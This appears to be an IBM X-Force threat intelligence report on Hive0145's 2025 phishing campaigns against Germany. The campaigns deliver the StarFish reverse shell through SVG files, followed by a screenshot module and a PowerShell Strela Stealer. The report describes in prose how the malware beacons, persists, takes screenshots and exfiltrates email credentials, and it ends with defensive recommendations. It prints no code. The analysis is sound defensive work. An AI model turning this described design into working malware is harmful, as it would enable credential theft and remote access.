Hive0145 back in German inboxes with Strela Stealer and a backdoor

As of early June 2025, IBM X-Force observed new phishing campaigns attributed to Hive0145. This threat actor is known for their delivery of Strela Stealer to exfiltrate email credentials since at least 2022. Hive0145's latest campaigns targeting Germany make use of malicious SVG files to download a simple reverse shell that X-Force named StarFish. The StarFish script supports persistent access and the deployment of follow-on payloads for the first time. This new capability marks a clear shift in intent for the threat actor and translates into a higher risk for victims in comparison to previous campaigns. Among the observed secondary payloads were a screenshot module and a PowerShell-based implementation of Strela Stealer.

• Hive0145 continues to target Germany in high-volume phishing campaigns through June and July 2025
• As of June 2025, Hive0145 uses SVG files to drop a reverse shell malware, StarFish, enabling persistent access to infected machines
• Among the secondary payloads, X-Force discovered a screenshot module and a PowerShell-based implementation of Strela Stealer

X-Force first began observing heightened activity from Hive0145 in April 2023. This threat actor is assessed to be financially motivated and is likely functioning as an initial access broker (IAB). Hive0145 stands out from the threat landscape due to its evolving techniques and tightly limited scope of actions on the objective, with a central focus on email credentials. The group is believed to be the exclusive operator of Strela Stealer–a credential-harvesting malware designed to extract login information from Microsoft Outlook and Mozilla Thunderbird. Although the malware has been implemented in C, .NET and now PowerShell, the original functionality has not changed. This kind of data theft often sets the stage for Business Email Compromise (BEC) attacks.

IABs like Hive0145 play a crucial role in the cyber criminal ecosystem by acquiring and selling access to compromised environments. They typically offload stolen credentials and other valuable data to third-party actors who specialize in other aspects of the attack chain. While this is standard practice for IABs, it remains unclear whether Hive0145 is aligned with any specific buyers or affiliates when distributing access gained through their operations.

Hive0145’s activity began in late 2022 with basic phishing campaigns delivering Strela Stealer via malicious email attachments. These early efforts primarily targeted Spanish-speaking users and focused on credential theft from Outlook and Thunderbird. The emails used generic invoice lures and relied on basic social engineering tactics.

By early 2023, Hive0145 expanded its targeting to include users in Germany and Italy. These campaigns showed improved localization, using translated lures and more region-specific content. The malware delivery remained attachment-based, but the phishing emails grew more tailored to increase credibility. Around mid-2024, the actor shifted to a more advanced technique: hijacking legitimate invoice emails. They would manipulate real stolen emails and replace original attachments with weaponized ZIP files containing obfuscated JavaScript loaders.

In late 2023 and early 2024, Hive0145 incorporated polyglot files, valid code-signing certificates and new crypters like Stellar Loader to improve evasion. The targeting expanded further to include systems with Catalan, Polish and Basque locales, showing broader regional intent. By mid-2024, campaigns became more frequent and structured, with Hive0145 launching phishing waves on a near-weekly basis. Ukrainian targets were added to the scope, and Strela Stealer was updated to collect system metadata and application inventories, signaling a shift toward more comprehensive reconnaissance alongside credential theft.

In early June 2025, X-Force observed another Hive0145 email phishing campaign targeting Germany. The threat actors used real emails, likely stolen from previous infections, along with the corresponding attachment name. The attachment file type is changed to .SVG (scalable vector graphic), but it retains the original filename to maintain the appearance of authenticity. All emails successfully pass an SPF (Sender Policy Framework) check, suggesting that the emails are indeed being sent from a legitimate domain and not being spoofed. The vast majority of emails and attachment names contain the word "Rechnung" in the German language (translates to "Invoice") and were dated between January and May 2025.

The initial campaign lasted from June 4th until June 19th and used SVG files with embedded HTML to download a ZIP file containing a malicious JScript (JS). The first wave only used a handful of different download domains in the malicious SVG droppers, all of which were taken down shortly after the campaign began, which likely limited the number of successful downloads.

On July 3rd, Hive0145 returned with a high volume campaign featuring a significantly larger pool of malicious domains. 

If the victim opens the SVG file on their machine, the browser will render the embedded HTML:

The HTML displays a progress bar and loads a remote script responsible for downloading a ZIP file:

The dropped ZIP file uses a name to suggest it contains the document a victim would expect. Instead, it contains an obfuscated JScript file which implements a simple reverse shell called StarFish. This is the first time that Hive0145 was observed deploying a backdoor malware and demonstrates a clear change in intent with the new capability to deploy arbitrary payloads.

Upon execution, the StarFish script generates a unique victim ID by combining the machine's product ID and computer name. It then sends an HTTP GET request to a hardcoded command and control (C2) server's "server.php" endpoint. The server responds with the string "OK", immediately followed by an optional command, which is directly executed on the machine via cmd.exe. Should the command contain the placeholder string "%SCRIPT_NAME%", it will be replaced with the reverse shell's path. The output of the command is sent back as a POST request after command completion or a specified maximum time limit.

The first C2 command is always aimed at achieving persistence for the reverse shell through the registry:

StarFish continues to request new commands every 48 seconds. The final Strela Stealer payload is only dropped after passing anti-sandbox checks, including an extended time of constant beaconing and a successful screenshot capture.

After several minutes of beaconing, the next stage is executed: a PowerShell script named "sc.ps1" downloaded from the same server.

The script takes a screenshot of the victim's current screen and attempts to upload it to the 0x0 free file hoster (https://git.0x0.st/mia/0x0). After a successful upload, the file hoster sends back a unique URL to view the screenshot, which is relayed back to the C2 server via the reverse shell.

The final payload is another PowerShell script downloaded from the server's "strel.php" endpoint. The script is a direct implementation of the original Strela Stealer behavior as observed in all past Hive0145 campaigns. The Stealer attempts to extract, decrypt and exfiltrate email inbox credentials from the Thunderbird and Microsoft Outlook email clients.

Any credentials are stored in a temporary file and exfiltrated via the curl command to the server's "up2.php" endpoint.

X-Force also observed the "invoice.php" endpoint on the C2 server attempting to download or display a PDF, "invoice.pdf". This is likely used as a decoy measure and has been observed in previous Strela Stealer campaigns orchestrated by Hive0145.

Hive0145 is a highly capable threat actor showing a strong motivation to adapt over the past years. With the latest campaign's shift towards backdoor malware with persistent access, the threat actor demonstrates clear intent and capability to evolve repeatedly and increase their scope outside of traditional email credential harvesting. The refinement in the infection process, which now deploys Strela Stealer only after prolonged beaconing and screen capture, underscores the increasing intent of the threat actor to evade analysis and research of later-stage payloads. Lastly, Hive0145's unique approach to phishing is likely one of the main keys to its success, enabling high-volume campaigns across targeted geographies.

X-Force recommends organizations:

• Exercise caution with emails and ZIP archive attachments
• Employ detection rules for malicious SVG files that execute JavaScript and drop further payloads
• Consider changing the default application for JavaScript/JScript/VBScript files to Notepad
• Monitor curl.exe processes potentially exfiltrating data
• Install and configure endpoint security software
• Update relevant network security monitoring rules
• Educate staff on the potential threats to the organization